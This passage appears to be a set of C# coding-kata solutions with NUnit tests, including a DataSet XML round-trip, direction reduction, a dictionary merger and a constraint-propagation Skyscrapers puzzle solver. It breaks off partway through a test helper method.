            DataTable dataTable = new DataTable("abcd");
            dataSet.Tables.Add(dataTable);
            dataTable.Columns.Add(new DataColumn("Col1", typeof(string)));
            dataTable.Rows.Add(100000000.12345678911);
            //dataTable.Rows.Add("2,5");
            dataTable.Rows.Add(DBNull.Value);
            //dataTable.AcceptChanges();
            dataSet.AcceptChanges();
            dataSet.WriteXml("d:\\temp\\myfile21431.txt", XmlWriteMode.WriteSchema);
            Console.Write(dataSet.GetXml());
            Console.WriteLine();
            Console.WriteLine();
            Console.WriteLine("***************Schema*************");
            Console.WriteLine();
            Console.Write(dataSet.GetXmlSchema());
            DataSet dataSet1 = new DataSet();
            dataSet1.ReadXml("d:\\temp\\myfile21431.txt");
            Console.WriteLine();
            Console.WriteLine();
            Console.Write(dataSet1.GetXml());
        }
    }
    [TestFixture]
    public class TestDatasetTrials
    {
        // Smoke test: runs the DataSet round-trip and relies on it not throwing.
        [Test]
        public void SimpleUnitNameTests()
        {
            DatasetTrials.WriteToDataset();
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DirectionsReduction.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
public class DirReduction
{
public static string[] dirReduc(string[] arr)
{
var stack = new Stack<string>();
stack.Push(string.Empty);
stack = arr.Aggregate(stack, (dirStack, currDir) =>
{
if (TryDirReduc(currDir, dirStack.Peek())) dirStack.Pop();
else dirStack.Push(currDir);
return dirStack;
});
var list = stack.Reverse().ToList();
list.RemoveAt(0);
return list.ToArray();
}
private static bool TryDirReduc(string currDir, string prevDir)
{
if (prevDir == "NORTH" && currDir == "SOUTH") return true;
if (prevDir == "SOUTH" && currDir == "NORTH") return true;
if (prevDir == "EAST" && currDir == "WEST") return true;
if (prevDir == "WEST" && currDir == "EAST") return true;
return false;
}
}
    [TestFixture]
    public class DirReductionTests
    {
        [Test]
        public void Test1()
        {
            // Opposite pairs cancel transitively until only WEST survives.
            string[] a = new string[] { "NORTH", "SOUTH", "SOUTH", "EAST", "WEST", "NORTH", "WEST" };
            string[] b = new string[] { "WEST" };
            Assert.AreEqual(b, DirReduction.dirReduc(a));
        }
        [Test]
        public void Test2()
        {
            // No adjacent opposites, so the input comes back unchanged.
            string[] a = new string[] { "NORTH", "WEST", "SOUTH", "EAST" };
            string[] b = new string[] { "NORTH", "WEST", "SOUTH", "EAST" };
            Assert.AreEqual(b, DirReduction.dirReduc(a));
        }
    }
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/FindTheOddInt.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
class FindTheOddInt
{
public static int find_it(int[] seq)
{
HashSet<int> intOddSet = new HashSet<int>();
foreach (int i in seq)
{
if (!intOddSet.Remove(i)) intOddSet.Add(i);
}
return intOddSet.First();
}
[Test]
public void Tests()
{
Assert.AreEqual(5, find_it(new[] { 20, 1, -1, 2, -2, 3, 3, 5, 5, 1, 2, 4, 20, 4, -1, -2, 5 }));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DictionaryMerge.cs
using NUnit.Framework;
using System.Collections.Generic;
using System.Linq;
namespace DictionaryMergerKata
{
public sealed class DictionaryMerger
{
public static Dictionary<TKey, TValue[]> Merge<TKey, TValue>(params Dictionary<TKey, TValue>[] dicts)
{
return dicts
.SelectMany(p => p)
.GroupBy(p => p.Key, p => p.Value)
.ToDictionary(g => g.Key, g => g.ToArray());
}
}
    // Tests for DictionaryMerger.Merge covering empty, single and overlapping
    // input dictionaries.
    [TestFixture]
    public class AccountTest
    {
        [Test]
        public void Merge_EmptyDictionaries_Returns_Empty_Dictionary()
        {
            var empty1 = new Dictionary<string, int>();
            var empty2 = new Dictionary<string, int>();
            var empty3 = new Dictionary<string, int>();
            Assert.IsEmpty(DictionaryMerger.Merge(empty1), "Single empty dictionary should create an empty dictionary");
            Assert.IsEmpty(DictionaryMerger.Merge(empty1, empty2), "Two empty dictionaries should create an empty dictionary");
            Assert.IsEmpty(DictionaryMerger.Merge(empty1, empty2, empty3), "Multiple empty dictionaries should create an empty dictionary");
        }
        [Test]
        public void Merge_Single_Dictionary_Returns_Dictionary_With_Same_Content()
        {
            var original = new Dictionary<string, int> { { "A", 1 }, { "B", 2 }, { "C", 3 } };
            var merged = DictionaryMerger.Merge(original);
            var expected = new Dictionary<string, int[]> { { "A", new[] { 1 } }, { "B", new[] { 2 } }, { "C", new[] { 3 } } };
            Compare(merged, expected);
        }
        [Test]
        public void Merge_Two_Simple_Dictionaries_Returns_Combined_Dictionary()
        {
            var original1 = new Dictionary<string, int> { { "A", 1 } };
            var original2 = new Dictionary<string, int> { { "B", 2 } };
            var merged = DictionaryMerger.Merge(original1, original2);
            var expected = new Dictionary<string, int[]> { { "A", new[] { 1 } }, { "B", new[] { 2 } } };
            Compare(merged, expected);
        }
        [Test]
        public void Merge_Two_Dictionaries_With_Multiple_Values_Returns_Combined_Dictionary()
        {
            var original1 = new Dictionary<string, int> { { "A", 1 }, { "B", 2 }, { "C", 3 } };
            var original2 = new Dictionary<string, int> { { "A", 4 }, { "D", 5 } };
            var merged = DictionaryMerger.Merge(original1, original2);
            var expected = new Dictionary<string, int[]> { { "A", new[] { 1, 4 } }, { "B", new[] { 2 } }, { "C", new[] { 3 } }, { "D", new[] { 5 } } };
            Compare(merged, expected);
        }
        // Asserts that actual and expected have the same keys and equivalent
        // value arrays (order-insensitive per key).
        private void Compare<TKey, TValue>(Dictionary<TKey, TValue[]> actual, Dictionary<TKey, TValue[]> expected)
        {
            Assert.AreEqual(expected.Count, actual.Count, "The dictionary does not contain the expected number of elements");
            foreach (var actualPair in actual)
            {
                TValue[] expectedValue;
                if (!expected.TryGetValue(actualPair.Key, out expectedValue))
                {
                    Assert.Fail("The result dictionary does not contain all required keys");
                }
                CollectionAssert.AreEquivalent(expectedValue, actualPair.Value, "The values in the dictionary are not matching");
            }
        }
    }
}<file_sep>/ConsoleApplication1/ConsoleApplication1/Skyscrapers.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using Castle.Core.Internal;
using NUnit.Framework;
namespace ConsoleApplication1
{
class Skyscrapers
{
public const int Size = 7;
private static bool _processingClues;
public static Cell[][] AllCells;
private static Lane[] AllLanes;
        // One grid square: tracks the candidate heights still possible and the
        // value finally committed, propagating eliminations to its row/column.
        internal class Cell
        {
            public int X;
            public int Y;
            // Candidate heights (1..Size) not yet ruled out for this cell.
            public readonly List<int> PossibleValues;
            // Committed height, or 0 while still undecided.
            public int ValueSet;
            public Cell(int x, int y)
            {
                X = x;
                Y = y;
                PossibleValues = new List<int>(Enumerable.Range(1, Size));
            }
            // Copy constructor used by Backup snapshots.
            public Cell(Cell cell)
            {
                X = cell.X;
                Y = cell.Y;
                PossibleValues = new List<int>(cell.PossibleValues);
                ValueSet = cell.ValueSet;
            }
            // Removes a candidate; cascades into SetCellValue when only one
            // candidate remains, and into single-position elimination for the
            // removed value. Returns Failed when a contradiction is detected.
            public Result RemoveValue(int value)
            {
                if (!PossibleValues.Remove(value)) return Result.NoChange;
                if (PossibleValues.Count == 0) return Result.Failed;
                if (PossibleValues.Count == 1)
                {
                    if (Result.Failed == (SetCellValue(PossibleValues.First()) & Result.Failed)) return Result.Failed;
                }
                if (EliminateValuesSingle(value) == Result.Failed) return Result.Failed;
                return Result.Changed;
            }
            // If value is possible in exactly one cell of this cell's column or
            // row, commit it there ("hidden single" deduction).
            private Result EliminateValuesSingle(int value)
            {
                Result result = Result.NoChange;
                //Iterate over column and find if this value is present only in one cell then set value for that cell.
                Cell uniqueCell = null;
                for (int x = 0, y = Y; x < Size; x++)
                {
                    Cell currCell = AllCells[x][y];
                    if (currCell.PossibleValues.Contains(value))
                    {
                        if (uniqueCell != null)
                        {
                            uniqueCell = null;
                            break;
                        }
                        uniqueCell = currCell;
                    }
                }
                if(uniqueCell != null) result = uniqueCell.SetCellValue(value);
                if( result == Result.Failed) return Result.Failed;
                //Iterate over rows
                uniqueCell = null;
                for (int x = X, y = 0; y < Size; y++)
                {
                    Cell currCell = AllCells[x][y];
                    if (currCell.PossibleValues.Contains(value))
                    {
                        if (uniqueCell != null)
                        {
                            uniqueCell = null;
                            break;
                        }
                        uniqueCell = currCell;
                    }
                }
                if(uniqueCell != null) result = uniqueCell.SetCellValue(value);
                return result;
            }
            // Commits value to this cell, strips the other candidates, removes
            // value from the rest of the row and column, and (while clues are
            // being processed) trims solved cells off the ends of affected lanes.
            public Result SetCellValue(int value)
            {
                if (ValueSet != 0) return Result.NoChange;
                ValueSet = value;
                List<int> toBeRemoved = PossibleValues.Where(v => v != value).ToList();
                if(toBeRemoved.Any(v => RemoveValue(v) == Result.Failed)) return Result.Failed;
                for (int i = 0; i < Size; i++)
                {
                    if (i == Y) continue;
                    if(GetCell(X, i).RemoveValue(value) == Result.Failed) return Result.Failed;
                }
                for (int i = 0; i < Size; i++)
                {
                    if (i == X) continue;
                    if(GetCell(i, Y).RemoveValue(value) == Result.Failed) return Result.Failed;
                }
                if (!_processingClues) return Result.Changed;
                foreach (int laneIndex in GetLanesContainingCell(this))
                {
                    Lane lane = AllLanes[laneIndex];
                    if (lane.Clue == 0) continue;
                    // Peel solved cells from the far end of the lane.
                    for (var i = lane.Cells.Count - 1; i >= 0; i--)
                    {
                        Cell cell = lane.Cells[i];
                        if(cell.ValueSet == 0) break;
                        lane.Cells.RemoveAt(i);
                        if (!lane.Cells.Any()) lane.Clue = 0;
                        // A solved cell at least as tall as everything left in
                        // the lane must have been visible: consume one clue unit.
                        else if (cell.ValueSet >= lane.Cells.Select(c => c.PossibleValues.Max()).Max()) lane.Clue--;
                    }
                }
                return Result.Changed;
            }
            // Restores this cell's state from a Backup snapshot.
            public void CopyFrom(Cell cell)
            {
                PossibleValues.Clear();
                PossibleValues.AddRange(cell.PossibleValues);
                ValueSet = cell.ValueSet;
            }
        }
        // One viewing line (a row or column seen from one of the four borders):
        // the remaining clue value plus the unsolved cells in viewing order.
        internal class Lane
        {
            public int Clue;
            public readonly List<Cell> Cells;
            public Lane(int clue, int index)
            {
                Clue = clue;
                Cells = GetLaneCells(index);
            }
            // Copy constructor used by Backup snapshots (cell objects are shared).
            public Lane(Lane lane)
            {
                Clue = lane.Clue;
                Cells = new List<Cell>(lane.Cells);
            }
            // Maps a clue index to the cells of its lane, ordered from the
            // border the clue is read from. The four index bands correspond to
            // the four borders (assumed clockwise clue ordering - TODO confirm
            // against the kata's clue layout).
            private static List<Cell> GetLaneCells(int index)
            {
                List<Cell> laneCells = new List<Cell>(Size);
                if (index < Size)
                {
                    for (var i = 0; i < Size; i++)
                    {
                        laneCells.Add(GetCell(i, index));
                    }
                }
                else if (index < 2 * Size)
                {
                    for (var i = 0; i < Size; i++)
                    {
                        laneCells.Add(GetCell(index - Size, Size - i - 1));
                    }
                }
                else if (index < 3 * Size)
                {
                    for (var i = 0; i < Size; i++)
                    {
                        laneCells.Add(GetCell(Size - i - 1, 3 * Size - index - 1));
                    }
                }
                else
                {
                    for (var i = 0; i < Size; i++)
                    {
                        laneCells.Add(GetCell(4 * Size - index - 1, i));
                    }
                }
                return laneCells;
            }
            // Debug representation: "<clue>,<remaining cell count>".
            public override string ToString()
            {
                return Clue + "," + Cells.Count;
            }
            // Debug helper: coordinates of the first remaining cell, or "S00".
            public string FirstIndices()
            {
                if (Cells.Any()) return Cells.First().X + "," + Cells.First().Y;
                return "S00";
            }
            // Returns the lane viewing the same row/column from the opposite
            // border, derived from the direction of the first two cells.
            public Lane GetOppositeLane()
            {
                if(Cells.Count < 2) throw new InvalidOperationException("Call this method only if there are more than two cells in a lane");
                if (Cells[0].X == Cells[1].X)
                {
                    if(Cells[0].Y > Cells[1].Y)
                        return AllLanes[4 * Size - Cells[0].X - 1];
                    return AllLanes[Size + Cells[0].X];
                }
                else
                {
                    if(Cells[0].X < Cells[1].X)
                        return AllLanes[3 * Size - Cells[0].Y - 1];
                    return AllLanes[Cells[0].Y];
                }
            }
        }
internal class Backup
{
public readonly Cell[][] _allCells;
public readonly Lane[] _allLanes;
public Backup()
{
_allCells = new Cell[Size][];
for (var i = 0; i < Size; i++)
{
_allCells[i] = new Cell[Size];
for (int j = 0; j < Size; j++)
{
_allCells[i][j] = new Cell(AllCells[i][j]);
}
}
_allLanes = new Lane[4*Size];
for (var i = 0; i < _allLanes.Length; i++)
{
_allLanes[i] = new Lane(AllLanes[i]);
}
}
public void Restore()
{
for (var i = 0; i < Size; i++)
{
for (var j = 0; j < Size; j++)
{
AllCells[i][j].CopyFrom(_allCells[i][j]);
}
}
AllLanes = _allLanes;
AllLanes = new Lane[4*Size];
for (var i = 0; i < _allLanes.Length; i++)
{
AllLanes[i] = new Lane(_allLanes[i]);
}
}
}
        // Optional expected solution that tests may set as a debugging hook; the
        // solver itself never reads it from what is visible here.
        public static int[][] Expected { get; set; }
        /// <summary>
        /// Solves a Size x Size skyscraper puzzle. <paramref name="clues"/> holds
        /// 4*Size visibility clues in clockwise order; 0 means "no clue".
        /// Returns the solved grid, or null when constraint propagation detects a
        /// contradiction. Note: the solver works on static state, so it is not
        /// safe to call concurrently.
        /// </summary>
        public static int[][] SolvePuzzle(int[] clues)
        {
            // Reset the static grid: every cell starts with all values possible.
            AllCells = new Cell[Size][];
            for (var i = 0; i < Size; i++)
            {
                AllCells[i] = new Cell[Size];
                for (var j = 0; j < Size; j++)
                {
                    AllCells[i][j] = new Cell(i, j);
                }
            }
            // One lane per clue position (clues.Length is expected to be 4*Size).
            AllLanes = new Lane[4 * Size];
            for (var i = 0; i < clues.Length; i++)
            {
                AllLanes[i] = new Lane(clues[i], i);
            }
            _processingClues = true;
            // Pure constraint propagation first; a contradiction here means the
            // clues are unsatisfiable.
            if(Result.Failed == (ProcessClues() & Result.Failed)) return null;
            // NOTE(review): flag apparently stays true on purpose so the lane
            // bookkeeping in Cell.SetCellValue keeps running during the search
            // below — confirm before re-enabling this line.
            //_processingClues = false;
            if (!PuzzleSolved())
            {
                FindChoicesAndEliminate(clues);
            }
            // Build the result grid. For a solved cell the sum of its remaining
            // possible values is simply its value.
            int[][] grid = new int[Size][];
            for (var rowIndex = 0; rowIndex < Size; rowIndex++)
            {
                grid[rowIndex] = new int[Size];
                for (var colIndex = 0; colIndex < Size; colIndex++)
                {
                    grid[rowIndex][colIndex] = AllCells[rowIndex][colIndex].PossibleValues.Aggregate((a, b) => a + b);
                }
            }
            return grid;
        }
        /// <summary>
        /// Backtracking search: takes the next (value, candidate cells) choice
        /// from GetChoices, speculatively removes the value from one candidate,
        /// re-runs propagation and recurses. The full solver state is restored
        /// from a snapshot whenever a branch fails. Returns true once a grid that
        /// satisfies every clue has been reached (the state is left solved).
        /// </summary>
        private static bool FindChoicesAndEliminate(int[] clues)
        {
            Backup backup = new Backup();
            foreach (Cell cell in GetChoices(out int valueToEliminate))
            {
                // Try the branch "this cell does NOT hold valueToEliminate".
                if (Result.Failed == (cell.RemoveValue(valueToEliminate) & Result.Failed))
                {
                    backup.Restore();
                    continue;
                }
                bool puzzleSolved = PuzzleSolved();
                if (!puzzleSolved)
                {
                    // Propagate the consequences of the elimination.
                    if (Result.Failed == (ProcessClues() & Result.Failed))
                    {
                        backup.Restore();
                        continue;
                    }
                    puzzleSolved = PuzzleSolved();
                }
                if (puzzleSolved)
                {
                    // Fully assigned: accept only if all clues actually hold.
                    if (ValidateClues(clues))
                    {
                        return true;
                    }
                    backup.Restore();
                }
                else
                {
                    // Still undecided cells: branch deeper.
                    if (FindChoicesAndEliminate(clues)) return true;
                    backup.Restore();
                }
            }
            return false;
        }
private static bool ValidateClues(int[] clues)
{
for (var i = 0; i < clues.Length; i++)
{
if(clues[i] == 0) continue;
Lane lane = new Lane(clues[i], i);
int numberOfVisible = 0;
int highestNumber = 0;
foreach (Cell cell in lane.Cells)
{
if (cell.ValueSet > highestNumber)
{
numberOfVisible++;
highestNumber = cell.ValueSet;
}
}
if (numberOfVisible != clues[i]) return false;
}
return true;
}
private static bool PuzzleSolved()
{
return !AllCells.Any(r => r.Any(c => c.ValueSet == 0));
}
private static Cell[] GetChoices(out int valueToEliminate)
{
SortedDictionary<int, Tuple<int, Cell[]>> options = new SortedDictionary<int, Tuple<int, Cell[]>>();
foreach (Lane lane in AllLanes)
{
foreach (int value in Enumerable.Range(1, Size))
{
Cell[] possibleCells = lane.Cells.Where(c => c.PossibleValues.Contains(value)).ToArray();
if (possibleCells.Length == 2)
{
valueToEliminate = value;
return possibleCells.ToArray();
}
if (possibleCells.Length > 2 && !options.ContainsKey(possibleCells.Length))
{
options[possibleCells.Length] = new Tuple<int, Cell[]>(value, possibleCells);
}
}
}
valueToEliminate = 0;
if(!options.Any()) return new Cell[0];
var firstOption = options.First();
valueToEliminate = firstOption.Value.Item1;
return firstOption.Value.Item2;
}
private static Result ProcessClues()
{
Result result = Result.Changed;
while (result == Result.Changed)
{
//Process clues
result = Result.NoChange;
for (var index = 0; index < AllLanes.Length; index++)
{
var lane = AllLanes[index];
result = ApplySimpleRules(lane) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
}
}
result = Result.Changed;
while (result == Result.Changed)
{
//Process clues
result = Result.NoChange;
for (var index = 0; index < AllLanes.Length; index++)
{
var lane = AllLanes[index];
result = ApplySpecialRules(lane) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
}
}
return result;
}
        /// <summary>
        /// Extra deduction for lanes with a solved prefix: if the cells between
        /// the solved prefix and the cell already holding the lane's tallest
        /// value must ALL be newly visible for the clue to work out
        /// (prefix-visible + in-between + the max itself == clue), then none of
        /// those in-between cells can be shorter than the tallest height already
        /// seen in the prefix.
        /// </summary>
        private static Result ApplySpecialRules(Lane lane)
        {
            if (lane.Cells.Count < 3) return Result.NoChange;
            // Walk the solved prefix, counting visible buildings and tracking the
            // tallest one; i ends up at the first unsolved cell.
            int visible = 0;
            int highestHeight = 0;
            var i = 0;
            for (; i < lane.Cells.Count; i++)
            {
                Cell cell = lane.Cells[i];
                if (cell.ValueSet == 0) break;
                if (cell.ValueSet > highestHeight)
                {
                    highestHeight = cell.ValueSet;
                    visible++;
                }
            }
            int max = lane.Cells.Select(c => c.PossibleValues.Max()).Max();
            // If the prefix already contains the lane maximum, nothing can be deduced.
            if (highestHeight == max) return Result.NoChange;
            // First cell at or after i already solved to the lane maximum
            // (FindIndex yields -1 when there is none; the equality below then
            // fails for the cases that matter and the loop body is skipped).
            int maxIndex = lane.Cells.FindIndex(i, c => c.ValueSet == max);
            Result result = Result.NoChange;
            if (lane.Clue - visible - 1 == maxIndex - i)
            {
                for (int j = i; j < maxIndex; j++)
                {
                    int[] valuesToBeRemoved = lane.Cells[j].PossibleValues.Where(p => p < highestHeight).ToArray();
                    foreach (var v in valuesToBeRemoved)
                    {
                        // RemoveValue may trim solved cells off this lane; if the
                        // lane changed under us, bail out and let the caller re-run.
                        int cellsCount = lane.Cells.Count;
                        result = lane.Cells[j].RemoveValue(v) | result;
                        if (Result.Failed == (result & Result.Failed)) return Result.Failed;
                        if (cellsCount != lane.Cells.Count) return result;
                    }
                }
            }
            return result;
        }
        /// <summary>
        /// Standard skyscraper deductions for a single lane:
        ///  - clue == 1: the edge cell must hold the tallest remaining value;
        ///  - clue == lane length: the lane must be strictly increasing, so every
        ///    cell takes its minimum possible value;
        ///  - clue == 2: the second cell can never hold the second-tallest value;
        ///  - in general, the k-th tallest value cannot sit within the first
        ///    (clue - k) cells from the clue's edge.
        /// Returns Failed on contradiction, Changed when anything was eliminated.
        /// </summary>
        private static Result ApplySimpleRules(Lane lane)
        {
            int clue = lane.Clue;
            int size = lane.Cells.Count;
            if (clue == 0) return Result.NoChange;
            Result result = Result.NoChange;
            if (clue == 1)
            {
                return lane.Cells[0].SetCellValue(lane.Cells[0].PossibleValues.Max());
            }
            if (clue == size)
            {
                for (int i = 0; i < size; i++)
                {
                    // ElementAtOrDefault: SetCellValue may trim solved cells off
                    // the lane while we iterate, so the index can run past the end.
                    Cell cell = lane.Cells.ElementAtOrDefault(i);
                    if (cell != null)
                    {
                        result = cell.SetCellValue(cell.PossibleValues.Min()) | result;
                        if (Result.Failed == (result & Result.Failed)) return Result.Failed;
                    }
                }
                return result;
            }
            // Sorted distinct values still available anywhere in the lane; there
            // must be exactly one per cell or the lane is unsatisfiable.
            List<int> possibleValuesInLane = lane.Cells.SelectMany(c => c.PossibleValues).Distinct().ToList();
            if (possibleValuesInLane.Count != size) return Result.Failed;
            possibleValuesInLane.Sort();
            if (clue == 2 && size > 1)
            {
                result = lane.Cells[1].RemoveValue(possibleValuesInLane[size - 2]);
                if (Result.Failed == result) return Result.Failed;
            }
            // Keep the tallest values far enough from the edge: the tallest value
            // is removed from the first clue-1 cells, the second tallest from the
            // first clue-2 cells, and so on.
            for (int indexToBeRemoved = size; indexToBeRemoved > size - clue + 1; indexToBeRemoved--)
            {
                for (int i = 0; i < clue + indexToBeRemoved - size - 1; i++)
                {
                    Cell cell = lane.Cells.ElementAtOrDefault(i);
                    if (cell != null)
                    {
                        // Bail out if RemoveValue trimmed cells off this lane.
                        int cellCount = lane.Cells.Count;
                        result = cell.RemoveValue(possibleValuesInLane[indexToBeRemoved-1]) | result;
                        if (Result.Failed == (result & Result.Failed)) return Result.Failed;
                        if (cellCount != lane.Cells.Count) return result;
                    }
                }
            }
            return result;
        }
private static int[] GetLanesContainingCell(Cell cell)
{
return new[] { cell.Y, cell.X + Size, 3 * Size - cell.Y - 1, 4 * Size - cell.X - 1 };
}
private static Cell GetCell(int x, int y)
{
return AllCells[x][y];
}
        /// <summary>
        /// Debug dump: renders the grid of remaining possible values with the
        /// clue lanes printed around the edges. Works on the live state, or on a
        /// <paramref name="backup"/> snapshot when one is supplied. Writes the
        /// rendering to Debug and Console and also returns it.
        /// </summary>
        public static string PrintValues(Backup backup = null)
        {
            Lane[] allLanes = AllLanes;
            Cell[][] allCells = AllCells;
            if (backup != null)
            {
                allLanes = backup._allLanes;
                allCells = backup._allCells;
            }
            // Lanes re-sorted into visual order (top row, then left/right per grid
            // row, then bottom row) so they can be popped while printing.
            Stack<Lane> orderedClues = new Stack<Lane>(Enumerable.Range(0, 4 * Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex)))
                .OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => allLanes[t.Item1]).Reverse());
            string values = Environment.NewLine
                            + "   " +
                            string.Join(string.Concat(Enumerable.Range(0,2*Size-2).Select(i => " ")),
                                Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) +
                            Environment.NewLine
                            + string.Join(Environment.NewLine,
                                allCells.Select(r =>
                                    orderedClues.Pop() + " |" +
                                    string.Join("|", r.Select(c => string.Join(",", c.PossibleValues) + string.Concat(Enumerable.Range(0, Size - c.PossibleValues.Count).Select(i => "  ")))) + "| " +
                                    orderedClues.Pop())) + Environment.NewLine
                            + "   " +
                            string.Join(string.Concat(Enumerable.Range(0,2*Size-2).Select(i => " ")),
                                Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) +
                            Environment.NewLine;
            Debug.Print(values);
            Console.Write(values);
            return values;
        }
}
    // Outcome of a deduction step. Flags so results can be OR-combined across a
    // sweep: Changed accumulates, Failed dominates (checked via "& Failed").
    [Flags]
    internal enum Result
    {
        NoChange = 0,   // nothing was eliminated
        Changed = 1,    // at least one possibility was eliminated
        Failed = 2      // a contradiction was reached
    }
    /// <summary>
    /// NUnit tests for 4x4 puzzles (they only pass when Skyscrapers.Size == 4).
    /// Also hosts diagnostic helpers (GetLaneIndices2, ErrorMessage) reused by
    /// the 6x6/7x7 fixtures and by Skyscrapers.PrintValues.
    /// </summary>
    [TestFixture]
    public class SkyscrapersTests4by4
    {
        private const int Size = Skyscrapers.Size;
        /// <summary>
        /// Maps a clockwise clue index to a (row, column)-style sort key used
        /// only for ordering the clues when printing them around the grid.
        /// </summary>
        public static int[] GetLaneIndices2(int clueIndex)
        {
            if (clueIndex < Skyscrapers.Size)
            {
                return new[] { -1, clueIndex };
            }
            if (clueIndex < 2 * Skyscrapers.Size)
            {
                return new[] { clueIndex - Skyscrapers.Size, 1 };
            }
            if (clueIndex < 3 * Skyscrapers.Size)
            {
                return new[] { Skyscrapers.Size, 3 * Skyscrapers.Size - clueIndex - 1 };
            }
            return new[] { 4 * Skyscrapers.Size - clueIndex - 1, 0 };
        }
        [Test]
        public void SolveSkyscrapers1()
        {
            var clues = new[]{
                2, 2, 1, 3,
                2, 2, 3, 1,
                1, 2, 2, 3,
                3, 2, 1, 3};
            var expected = new[]{ new []{1, 3, 4, 2},
                new []{4, 2, 1, 3},
                new []{3, 4, 2, 1},
                new []{2, 1, 3, 4 }};
            // Clues re-sorted into print order so ErrorMessage can pop them while
            // rendering the failure diagnostic.
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        [Test]
        public void SolveSkyscrapers2()
        {
            var clues = new[]{
                0, 0, 1, 2,
                0, 2, 0, 0,
                0, 3, 0, 0,
                0, 1, 0, 0};
            var expected = new[]{ new []{2, 1, 4, 3},
                new []{3, 4, 1, 2},
                new []{4, 2, 3, 1},
                new []{1, 3, 2, 4}};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        [Test]
        public void SolveSkyscrapers3()
        {
            var clues = new[]{
                1, 2, 4, 2,
                2, 1, 3, 2,
                3, 1, 2, 3,
                3, 2, 2, 1};
            var expected = new[]{
                new []{ 4, 2, 1, 3},
                new []{ 3, 1, 2, 4},
                new []{ 1, 4, 3, 2},
                new []{ 2, 3, 4, 1}};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        // NOTE(review): this test is identical to SolveSkyscrapers1 — it was
        // likely meant to exercise a different puzzle.
        [Test]
        public void SolveSkyscrapers4()
        {
            var clues = new[]{
                2, 2, 1, 3,
                2, 2, 3, 1,
                1, 2, 2, 3,
                3, 2, 1, 3};
            var expected = new[]{
                new []{ 1, 3, 4, 2},
                new []{ 4, 2, 1, 3},
                new []{ 3, 4, 2, 1},
                new []{ 2, 1, 3, 4}};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        [Test]
        public void SolveSkyscrapers5()
        {
            var clues = new[]{
                0, 2, 0, 0,
                0, 3, 0, 0,
                0, 1, 0, 0,
                0, 0, 1, 2};
            var expected = new[]{
                new []{ 3, 2, 1, 4},
                new []{ 4, 1, 3, 2},
                new []{ 1, 4, 2, 3},
                new []{ 2, 3, 4, 1}};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        [Test]
        public void SolveSkyscrapers6()
        {
            var clues = new[]{
                2, 2, 3, 1,
                1, 2, 2, 3,
                3, 2, 1, 3,
                2, 2, 1, 3};
            var expected = new[]{
                new []{ 2, 3, 1, 4},
                new []{ 4, 1, 2, 3},
                new []{ 3, 2, 4, 1},
                new []{ 1, 4, 3, 2}};
            Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
                .Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
                .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
            var actual = Skyscrapers.SolvePuzzle(clues);
            CollectionAssert.AreEqual(expected, actual,
                ErrorMessage(expected, actual, orderedClues)
            );
        }
        /// <summary>
        /// Builds a failure diagnostic: the expected grid, the solver's grid with
        /// wrong single-possibility cells starred, the clues around the edges, a
        /// full possible-values dump and the first differing index.
        /// </summary>
        public static string ErrorMessage(int[][] expected, int[][] actual, Stack<int> orderedClues)
        {
            return Environment.NewLine
                   + String.Join(Environment.NewLine, expected.Select(r => String.Join("|", r)))
                   + Environment.NewLine + Environment.NewLine
